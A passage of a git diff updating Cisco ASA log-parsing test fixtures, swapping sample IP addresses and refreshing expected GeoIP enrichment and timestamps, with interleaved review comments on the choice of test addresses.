 "preserve_original_event"
@@ -19197,7 +19197,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -19206,8 +19206,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-10-06T20:55:00.168463200Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:33:41.996207600Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -19243,8 +19243,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -19278,7 +19278,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -19287,8 +19287,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-10-06T20:55:00.168468200Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:33:41.996215200Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -19324,8 +19324,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -19359,7 +19359,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -19368,8 +19368,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-10-06T20:55:00.168474600Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:33:41.996221700Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -19405,8 +19405,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -19440,7 +19440,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -19449,8 +19449,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-10-06T20:55:00.168482600Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:33:41.996227100Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -19486,8 +19486,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -19521,7 +19521,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -19530,8 +19530,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-10-06T20:55:00.168490300Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:33:41.996232200Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -19567,8 +19567,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -19602,7 +19602,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -19611,8 +19611,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-10-06T20:55:00.168498200Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:33:41.996238400Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -19648,8 +19648,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -19683,7 +19683,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -19692,8 +19692,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-10-06T20:55:00.168516600Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:33:41.996244800Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -19729,8 +19729,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -19764,7 +19764,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -19773,8 +19773,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-10-06T20:55:00.168523300Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:33:41.996249400Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -19810,8 +19810,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -19845,7 +19845,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -19854,8 +19854,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-10-06T20:55:00.168532Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:33:41.996254700Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -19891,8 +19891,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -19926,7 +19926,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -19935,8 +19935,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-10-06T20:55:00.168536800Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:33:41.996260900Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -19972,8 +19972,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -20007,7 +20007,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -20016,8 +20016,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-10-06T20:55:00.168543200Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:33:41.996266Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -20053,8 +20053,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -20088,7 +20088,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -20097,8 +20097,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-10-06T20:55:00.168547800Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:33:41.996271Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -20134,8 +20134,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -20169,7 +20169,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -20178,8 +20178,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-10-06T20:55:00.168553400Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:33:41.996277100Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -20215,8 +20215,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -20250,7 +20250,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -20259,8 +20259,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-10-06T20:55:00.168557600Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:33:41.996281800Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -20296,8 +20296,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -20331,7 +20331,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -20340,8 +20340,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-10-06T20:55:00.168563400Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:33:41.996286800Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -20377,8 +20377,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -20412,7 +20412,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -20421,8 +20421,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-10-06T20:55:00.168571500Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:33:41.996293300Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -20458,8 +20458,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -20493,7 +20493,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -20502,8 +20502,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-10-06T20:55:00.168579500Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:33:41.996299500Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -20539,8 +20539,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -20574,7 +20574,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -20583,8 +20583,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-10-06T20:55:00.168585Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:33:41.996305800Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -20620,8 +20620,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -20655,7 +20655,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -20664,8 +20664,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-10-06T20:55:00.168588900Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:33:41.996312Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -20701,8 +20701,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -20736,7 +20736,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -20745,8 +20745,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-10-06T20:55:00.168594500Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:33:41.996318300Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -20782,8 +20782,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -20817,7 +20817,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -20826,8 +20826,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-10-06T20:55:00.168598900Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:33:41.996324500Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -20863,8 +20863,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -20898,7 +20898,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -20907,8 +20907,8 @@ }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:00.168603400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:33:41.996330700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-dap-records.log b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-dap-records.log index a02a1136b19..7b4ae13e9de 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-dap-records.log +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-dap-records.log @@ -1 +1 @@ -Feb 20 2020 16:11:11: %ASA-6-734001: DAP: User firsname.lastname@domain.net, Addr 1.2.3.4, Connection AnyConnect: The following DAP records were selected for this connection: dap_1, dap_2 +Feb 20 2020 16:11:11: %ASA-6-734001: DAP: User firsname.lastname@domain.net, Addr 81.2.69.144, Connection AnyConnect: The following DAP records were selected for this connection: dap_1, dap_2 diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-dap-records.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-dap-records.log-expected.json index aab578e60d9..c9de8beac99 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-dap-records.log-expected.json +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-dap-records.log-expected.json 
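Review bot: The replacement address on the new `+Feb 20 2020 ... Addr 81.2.69.144` line is routable public space, and the expected output in the following hunk now pins third-party attribution for it (`GB-OXF`/`Abingdon`, AS `20712` `Andrews & Arnold Ltd`), so this fixture breaks whenever the GeoIP/ASN database the test runner consults changes its record for that address. Presumably the runner ships a fixed test database and that is what "supported subset" in the commit title refers to, but nothing on this page records which addresses belong to it; the same address is reused in test-not-ip.log and test-sample.log. Since a `.log` fixture cannot carry a comment without becoming an extra event, consider listing the sanctioned addresses once in the package's developer notes, e.g. `81.2.69.144 — present in the bundled GeoIP test DB; resolves to GB/Abingdon, AS20712`, so later fixtures do not reach for arbitrary public addresses that silently get no enrichment.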
@@ -7,18 +7,24 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "RU-MOW", - "city_name": "Moscow", - "country_iso_code": "RU", - "country_name": "Russia", - "region_name": "Moscow", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": 37.6172, - "lat": 55.7527 + "lon": -1.3614, + "lat": 51.7095 } }, - "address": "1.2.3.4", - "ip": "1.2.3.4" + "as": { + "number": 20712, + "organization": { + "name": "Andrews \u0026 Arnold Ltd" + } + }, + "address": "81.2.69.144", + "ip": "81.2.69.144" }, "tags": [ "preserve_original_event" @@ -34,13 +40,13 @@ }, "related": { "ip": [ - "1.2.3.4" + "81.2.69.144" ] }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:37.327236200Z", - "original": "Feb 20 2020 16:11:11: %ASA-6-734001: DAP: User firsname.lastname@domain.net, Addr 1.2.3.4, Connection AnyConnect: The following DAP records were selected for this connection: dap_1, dap_2", + "ingested": "2021-12-09T13:34:15.339875200Z", + "original": "Feb 20 2020 16:11:11: %ASA-6-734001: DAP: User firsname.lastname@domain.net, Addr 81.2.69.144, Connection AnyConnect: The following DAP records were selected for this connection: dap_1, dap_2", "code": "734001", "kind": "event", "action": "firewall-rule", diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-filtered.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-filtered.log-expected.json index b2ffff8ba6e..cab2b86a191 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-filtered.log-expected.json +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-filtered.log-expected.json 
@@ -31,7 +31,7 @@ }, "event": { "severity": 7, - "ingested": "2021-10-06T20:55:37.499279800Z", + "ingested": "2021-12-09T13:34:15.509140500Z", "original": "Jan 1 01:00:27 beats asa[1234]: %ASA-7-999999: This message is not filtered.", "code": "999999", "kind": "event", @@ -72,7 +72,7 @@ }, "event": { "severity": 8, - "ingested": "2021-10-06T20:55:37.499289100Z", + "ingested": "2021-12-09T13:34:15.509148700Z", "original": "Jan 1 01:00:30 beats asa[1234]: %ASA-8-999999: This phony message is dropped due to log level.", "code": "999999", "kind": "event", @@ -146,7 +146,7 @@ }, "event": { "severity": 2, - "ingested": "2021-10-06T20:55:37.499295700Z", + "ingested": "2021-12-09T13:34:15.509154300Z", "original": "Jan 1 01:02:12 beats asa[1234]: %ASA-2-106001: Inbound TCP connection denied from 10.13.12.11/45321 to 192.168.33.12/443 flags URG+SYN+RST on interface eth0", "code": "106001", "kind": "event", diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-hostnames.log b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-hostnames.log index 531c241da79..c51bd423da3 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-hostnames.log +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-hostnames.log @@ -1,2 +1,2 @@ Oct 10 2019 10:21:36 localhost: %ASA-6-302021: Teardown ICMP connection for faddr target.destination.hostname.local/10005 gaddr 10.0.55.66/0 laddr Prod-host.name.addr/0 -Jun 04 2011 21:59:52 MYHOSTNAME : %ASA-6-302021: Teardown ICMP connection for faddr 192.0.2.15/0 gaddr 192.0.2.134/57808 laddr 192.0.2.134/57808 type 8 code 0 +Jun 04 2011 21:59:52 MYHOSTNAME : %ASA-6-302021: Teardown ICMP connection for faddr 192.168.2.15/0 gaddr 192.168.2.134/57808 laddr 192.168.2.134/57808 type 8 code 0 
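Review bot: The new second line of test-hostnames.log swaps TEST-NET-1 (`192.0.2.0/24`, the RFC 5737 block reserved for exactly this kind of sample) for `192.168.2.0/24`, which is RFC 1918 private space, so the fixture no longer contains a single public address; the expected JSON in the next hunk shows no `geo` block for these hosts before or after, so parsing output is unchanged, but the "public address with no GeoIP match" path is no longer exercised here. The same prefix rewrite (`192.0.0.x`, `192.0.2.x` and `192.88.99.x` all to `192.168.x.x`) is applied in test-not-ip.log and test-sample.log, so after this commit the only public addresses left in these fixtures are the ones the geo database resolves. A private address on an interface named `outside`, or as the destination of a `Deny IP spoof` or `Dynamic Filter ... blacklisted` message, is also semantically odd for a firewall sample; should the pipeline later derive `network.direction` from a configured list of internal networks, these events would quietly change category without any fixture signalling it. Keeping one public address that is absent from the test database, such as a TEST-NET-1 address, would preserve that coverage.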
diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-hostnames.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-hostnames.log-expected.json index e47d118b24a..c0aa0eab790 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-hostnames.log-expected.json +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-hostnames.log-expected.json @@ -45,7 +45,7 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:37.810228600Z", + "ingested": "2021-12-09T13:34:15.786608700Z", "original": "Oct 10 2019 10:21:36 localhost: %ASA-6-302021: Teardown ICMP connection for faddr target.destination.hostname.local/10005 gaddr 10.0.55.66/0 laddr Prod-host.name.addr/0", "code": "302021", "kind": "event", @@ -69,12 +69,12 @@ "level": "informational" }, "destination": { - "address": "192.0.2.15", - "ip": "192.0.2.15" + "address": "192.168.2.15", + "ip": "192.168.2.15" }, "source": { - "address": "192.0.2.134", - "ip": "192.0.2.134" + "address": 